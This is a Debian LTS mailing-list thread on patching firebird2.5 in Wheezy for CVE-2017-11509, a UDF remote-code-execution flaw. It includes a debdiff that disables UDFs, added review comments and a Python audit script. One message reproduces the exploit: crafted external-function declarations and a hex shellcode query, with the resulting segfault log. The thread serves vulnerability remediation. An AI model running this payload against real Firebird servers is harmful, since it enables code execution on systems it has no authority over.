Re: Wheezy update of firebird2.5?

2018-05-09 Thread Brian May
Damyan Ivanov  writes:

> I have added you to https://salsa.debian.org/firebird-team/firebird2.5 
> so feel free to push your work. Thanks!

Ok, done.

Packages are available for testing at:

https://people.debian.org/~bam/debian/pool/main/f/firebird2.5/
-- 
Brian May 



Re: Wheezy update of firebird2.5?

2018-05-08 Thread Damyan Ivanov
-=| Brian May, 08.05.2018 17:19:56 +1000 |=-
> Damyan Ivanov  writes:
> > The only fix upstream has is to disable UDFs in firebird.conf -- 
> > https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
> >  
> > (probably needs adaptation for firebird2.5, but you get the idea).
> 
> The patch appears to apply fine without dramas. Attached is the debdiff
> from the previous LTS release.
> 
> Just compiling it now, but don't expect any problems.
> 
> Damyan,
> 
> Assuming I have write access to the firebird2.5 repository, do you have
> any objections if I push my changes (including the previous LTS release)
> to the wheezy branch in the git repository?

Sure!

I have added you to https://salsa.debian.org/firebird-team/firebird2.5 
so feel free to push your work. Thanks!


-- Damyan



Re: Wheezy update of firebird2.5?

2018-05-08 Thread Brian May
Damyan Ivanov  writes:

> -=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=-
>> I don't quite know where to go from here. I was somewhat hoping that
>> Wheezy would be magically not vulnerable to this issue, but obviously,
>> there's something wrong here that should probably be fixed.
>
> The only fix upstream has is to disable UDFs in firebird.conf -- 
> https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
>  
> (probably needs adaptation for firebird2.5, but you get the idea).

The patch appears to apply fine without dramas. Attached is the debdiff
from the previous LTS release.

Just compiling it now, but don't expect any problems.

Damyan,

Assuming I have write access to the firebird2.5 repository, do you have
any objections if I push my changes (including the previous LTS release)
to the wheezy branch in the git repository?

Regards
-- 
Brian May 

diff -Nru firebird2.5-2.5.2.26540.ds4/debian/changelog firebird2.5-2.5.2.26540.ds4/debian/changelog
--- firebird2.5-2.5.2.26540.ds4/debian/changelog	2017-03-30 06:01:20.0 +1100
+++ firebird2.5-2.5.2.26540.ds4/debian/changelog	2018-05-07 17:39:32.0 +1000
@@ -1,3 +1,13 @@
+firebird2.5 (2.5.2.26540.ds4-1~deb7u4) UNRELEASED; urgency=high
+
+  * Non-maintainer upload by the LTS Team.
+  * Disable UDFs in firebird.conf due to a remote authenticated code execution
+vilnerability
+https://www.tenable.com/security/research/tra-2017-36 (CVE-2017-11509)
+http://tracker.firebirdsql.org/browse/CORE-5518
+
+ -- Brian May   Mon, 07 May 2018 17:39:32 +1000
+
 firebird2.5 (2.5.2.26540.ds4-1~deb7u3) wheezy-security; urgency=high
 
   * Non-maintainer upload by the LTS Security Team.
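Review bot: the new changelog entry has a typo ("vilnerability" for "vulnerability") and is still targeted at UNRELEASED; before the upload it needs to become wheezy-security, matching the deb7u3 entry directly below it.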
diff -Nru firebird2.5-2.5.2.26540.ds4/debian/gbp.conf firebird2.5-2.5.2.26540.ds4/debian/gbp.conf
--- firebird2.5-2.5.2.26540.ds4/debian/gbp.conf	2013-07-23 08:21:41.0 +1000
+++ firebird2.5-2.5.2.26540.ds4/debian/gbp.conf	2018-05-07 17:39:32.0 +1000
@@ -1,2 +1,2 @@
 [DEFAULT]
-debian-branch=master
+debian-branch=wheezy
diff -Nru firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch
--- firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch	1970-01-01 10:00:00.0 +1000
+++ firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch	2018-05-07 17:39:32.0 +1000
@@ -0,0 +1,23 @@
+Description: disable UDFs in firebird.conf
+ UDFs can be used for remote code execution. see
+ https://www.tenable.com/security/research/tra-2017-36 (CVE-2017-11509)
+ http://tracker.firebirdsql.org/browse/CORE-5518
+Author: Damyan Ivanov 
+Forwarded: no, because upstream doesn't consider this to be a problem
+
+Index: firebird2.5/builds/install/misc/firebird.conf.in
+===
+--- firebird2.5.orig/builds/install/misc/firebird.conf.in
 firebird2.5/builds/install/misc/firebird.conf.in
+@@ -137,7 +137,10 @@
+ #
+ # Type: string (special format)
+ #
+-#UdfAccess = Restrict UDF
++# Debian maintainer note: UDFs can be used for remote code execution as the
++# 'firebird' user. See https://www.tenable.com/security/research/tra-2017-36
++# (CVE-2017-11509)
++UdfAccess = None
+ 
+ 
+ # 
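Review bot: the embedded quilt patch is malformed as shown: the `firebird2.5/builds/install/misc/firebird.conf.in` line that should be the inner diff's `+++` header has lost its leading `+` (it appears as a context line inside an `@@ -0,0 +1,23 @@` hunk that should contain only added lines), and the `Index:` separator below it is truncated to `===`. Check that the file in the repository is intact, otherwise quilt will refuse to apply it. Since the change only touches the template for the shipped firebird.conf, installations where the admin has already edited that file will keep their existing UdfAccess setting; a NEWS entry telling them to set `UdfAccess = None` by hand would close that gap.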
diff -Nru firebird2.5-2.5.2.26540.ds4/debian/patches/series firebird2.5-2.5.2.26540.ds4/debian/patches/series
--- firebird2.5-2.5.2.26540.ds4/debian/patches/series	2017-03-30 02:09:54.0 +1100
+++ firebird2.5-2.5.2.26540.ds4/debian/patches/series	2018-05-07 17:39:32.0 +1000
@@ -19,3 +19,4 @@
 out/crash-create-db-restricted.patch
 upstream/r60322-remote-crash.patch
 CVE-2017-6369.patch
+CVE-2017-11509.patch
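Review bot: the new entry is placed at the root of debian/patches while the neighbouring entries are grouped under out/ and upstream/, and the firebird3.0 counterpart referenced in the thread lives under deb/; consider deb/CVE-2017-11509.patch for consistency, adjusting the file path in the patch hunk above accordingly.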


Re: Wheezy update of firebird2.5?

2018-04-17 Thread Damyan Ivanov
-=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=-
> I don't quite know where to go from here. I was somewhat hoping that
> Wheezy would be magically not vulnerable to this issue, but obviously,
> there's something wrong here that should probably be fixed.

The only fix upstream has is to disable UDFs in firebird.conf -- 
https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
 
(probably needs adaptation for firebird2.5, but you get the idea).


-- dam



Re: Wheezy update of firebird2.5?

2018-04-17 Thread Antoine Beaupré
On 2018-04-04 19:54:14, Damyan Ivanov wrote:
> -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
>> Dear maintainer(s),
>> 
>> The Debian LTS team would like to fix the security issues which are
>> currently open in the Wheezy version of firebird2.5:
>> https://security-tracker.debian.org/tracker/source-package/firebird2.5
>> 
>> Would you like to take care of this yourself?
>
> Sorry, no.
>
> AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the 
> security team advised against updating that for stable, and the issue 
> is still open in unstable.
>
> According to the researchers discovering it, upstream refused to fix 
> it :( so the only "fix" I am aware of is the change in the default 
> config to disable the vulnerable functionality. You can find the patch 
> for firebird3.0 at 
> https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698
>
> It is perhaps not directly applicable to firebird2.5, but should help 
> regardless.

I tried digging into this issue a little further, and couldn't get
far. I always have this hurdle to just setup a test environment with
Firebird, so I figured I would share the procedure here for the future,
so that I wouldn't have to rebuild this from scratch every time.

 1. install the database and packages:

apt-get install firebird2.5-examples firebird2.5-dev firebird2.5-superclassic

 2. set an admin password and configure the server:

dpkg-reconfigure firebird2.5-superclassic

 3. deploy a test database:

gunzip -c /usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > /var/lib/firebird/2.5/data/employee.fdb
chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb

 4. connect to the database, in a `isql-fb` prompt:

SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 'SYSDBA' password 'password';

Then you can do stuff like `SHOW TABLES` and so on. In particular, I
have tried to reproduce the issue and I can confirm I can create two
external functions with the same ENTRY_POINT, although the second
snippet in the advisory has two `DECLARE` statements which I assume is a
typo:

DECLARE EXTERNAL FUNCTION string2blob
   VARCHAR(300) BY DESCRIPTOR,
   BLOB RETURNS PARAMETER 2
   ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

DECLARE EXTERNAL FUNCTION a6
  VARCHAR(300) BY DESCRIPTOR,
  VARCHAR(400) BY DESCRIPTOR
  RETURNS INTEGER
  ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

The actual query to trigger arbitrary code execution seems to fail,
however:

SQL> select a6((select 
x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7'
 from rdb$database), (select x'C8FD8503' from rdb$database)) from 
rdb$database
Statement failed, SQLSTATE = 08006
Unable to complete network request to host "localhost".
-Error writing data to the connection.

Considering it was crafted to start `CALC.EXE` in Windows, that might be
expected. We do see a segfault in the logs however:

wheezy  Tue Apr 17 16:49:56 2018
The user defined function:  A6
   referencing entrypoint:  string2blob
in module:  fbudf
caused the fatal exception: Segmentation Fault.
The code attempted to access memory
without privilege to do so.
This exception will cause the Firebird server
to terminate abnormally.

... which is probably a bad sign.

I don't quite know where to go from here. I was somewhat hoping that
Wheezy would be magically not vulnerable to this issue, but obviously,
there's something wrong here that should probably be fixed.

A.

-- 
Every time I see an adult on a bicycle I no longer despair for the
future of the human race.
 - H. G. Wells
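Two audit checks for what this thread discusses, written here as an added example (not code from the thread, from Debian or from Firebird): whether the UdfAccess setting in a firebird.conf actually switches UDFs off the way the Debian patch does, and whether a database declares several external functions on one ENTRY_POINT, the pattern Antoine reproduced above. The "Restrict UDF" default and the RDB$FUNCTIONS column names are assumptions taken from the shipped firebird.conf comment and Firebird's system tables; all sample inputs are constructed.

```python
"""Added example: audit firebird.conf's UdfAccess and look for UDF declarations
that share a module/entry point under different function names."""
import re
from collections import defaultdict

# Assumption: the shipped firebird.conf documents 'Restrict UDF' as the value
# used when the UdfAccess line is left commented out (the '#UdfAccess =
# Restrict UDF' line that the Debian patch replaces).
DEFAULT_UDF_ACCESS = "Restrict UDF"

_UDF_LINE = re.compile(r"^\s*UdfAccess\s*=\s*(.*?)\s*$", re.IGNORECASE)


def effective_udf_access(conf_text: str) -> str:
    """Return the UdfAccess value Firebird would use for this config text.
    Commented lines ('#...') are ignored; the last active setting wins."""
    value = DEFAULT_UDF_ACCESS
    for line in conf_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = _UDF_LINE.match(line)
        if m:
            value = m.group(1)
    return value


def udfs_disabled(conf_text: str) -> bool:
    """True only if UDF loading is switched off outright (UdfAccess = None)."""
    return effective_udf_access(conf_text).strip().lower() == "none"


def duplicate_entrypoints(functions):
    """Group (function name, module, entry point) rows, e.g. from
    SELECT RDB$FUNCTION_NAME, RDB$MODULE_NAME, RDB$ENTRYPOINT FROM RDB$FUNCTIONS
    (assumed column names), and return the (module, entry point) pairs that are
    declared under more than one function name. Firebird pads CHAR columns
    with blanks, so values are stripped before comparison."""
    seen = defaultdict(list)
    for name, module, entry in functions:
        seen[(module.strip().lower(), entry.strip().lower())].append(name)
    return {key: names for key, names in seen.items() if len(names) > 1}


# Constructed samples: the conf fragment before and after the Debian patch,
# and the two declarations from Antoine's reproduction plus an unrelated one.
CONF_BEFORE = "# Type: string (special format)\n#\n#UdfAccess = Restrict UDF\n"
CONF_AFTER = "# Type: string (special format)\n#\n# Debian note\nUdfAccess = None\n"
SAMPLE_FUNCTIONS = [
    ("STRING2BLOB", "fbudf", "string2blob"),
    ("A6         ", "fbudf ", "string2blob"),
    ("ADDDAY", "fbudf", "addDay"),
]
```

Run against a real config, read the file into `effective_udf_access`; for a live database, feed the rows of the RDB$FUNCTIONS query into `duplicate_entrypoints`.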



Re: Wheezy update of firebird2.5?

2018-04-04 Thread Damyan Ivanov
-=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
> Dear maintainer(s),
> 
> The Debian LTS team would like to fix the security issues which are
> currently open in the Wheezy version of firebird2.5:
> https://security-tracker.debian.org/tracker/source-package/firebird2.5
> 
> Would you like to take care of this yourself?

Sorry, no.

AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the 
security team advised against updating that for stable, and the issue 
is still open in unstable.

According to the researchers discovering it, upstream refused to fix 
it :( so the only "fix" I am aware of is the change in the default 
config to disable the vulnerable functionality. You can find the patch 
for firebird3.0 at 
https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698

It is perhaps not directly applicable to firebird2.5, but should help 
regardless.


Good luck!



Wheezy update of firebird2.5?

2018-04-04 Thread Chris Lamb
Dear maintainer(s),

The Debian LTS team would like to fix the security issues which are
currently open in the Wheezy version of firebird2.5:
https://security-tracker.debian.org/tracker/source-package/firebird2.5

Would you like to take care of this yourself?

If yes, please follow the workflow we have defined here:
https://wiki.debian.org/LTS/Development

If that workflow is a burden to you, feel free to just prepare an
updated source package and send it to debian-lts@lists.debian.org
(via a debdiff, or with an URL pointing to the source package,
or even with a pointer to your packaging repository), and the members
of the LTS team will take care of the rest. Indicate clearly whether you
have tested the updated package or not.

If you don't want to take care of this update, it's not a problem, we
will do our best with your package. Just let us know whether you would
like to review and/or test the updated package before it gets released.

You can also opt-out from receiving future similar emails in your
answer and then the LTS Team will take care of firebird2.5 updates
for the LTS releases.

Thank you very much.

Chris Lamb,
  on behalf of the Debian LTS team.

PS: A member of the LTS team might start working on this update at
any point in time. You can verify whether someone is registered
on this update in this file:
https://salsa.debian.org/security-tracker-team/security-tracker/raw/master/data/dla-needed.txt


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  la...@debian.org / chris-lamb.co.uk
   `-



Re: Wheezy update of firebird2.5?

2017-03-26 Thread Damyan Ivanov
-=| Ola Lundqvist, 25.03.2017 22:46:35 +0100 |=-
> Dear maintainer(s),
> 
> The Debian LTS team would like to fix the security issues which are
> currently open in the Wheezy version of firebird2.5:
> https://security-tracker.debian.org/tracker/CVE-2017-6369

Please feel free to take this over with the great LTS team. In case 
it would be of any help, the changes needed for the jessie upload are 
available at 
https://anonscm.debian.org/cgit/pkg-firebird/2.5.git/log/?h=jessie

-- dam




Wheezy update of firebird2.5?

2017-03-25 Thread Ola Lundqvist
Dear maintainer(s),

The Debian LTS team would like to fix the security issues which are
currently open in the Wheezy version of firebird2.5:
https://security-tracker.debian.org/tracker/CVE-2017-6369

Would you like to take care of this yourself?

If yes, please follow the workflow we have defined here:
https://wiki.debian.org/LTS/Development

If that workflow is a burden to you, feel free to just prepare an
updated source package and send it to debian-lts@lists.debian.org
(via a debdiff, or with an URL pointing to the source package,
or even with a pointer to your packaging repository), and the members
of the LTS team will take care of the rest. Indicate clearly whether you
have tested the updated package or not.

If you don't want to take care of this update, it's not a problem, we
will do our best with your package. Just let us know whether you would
like to review and/or test the updated package before it gets released.

You can also opt-out from receiving future similar emails in your
answer and then the LTS Team will take care of firebird2.5 updates
for the LTS releases.

Thank you very much.

Ola Lundqvist,
  on behalf of the Debian LTS team.

PS: A member of the LTS team might start working on this update at
any point in time. You can verify whether someone is registered
on this update in this file:
https://anonscm.debian.org/viewvc/secure-testing/data/dla-needed.txt?view=markup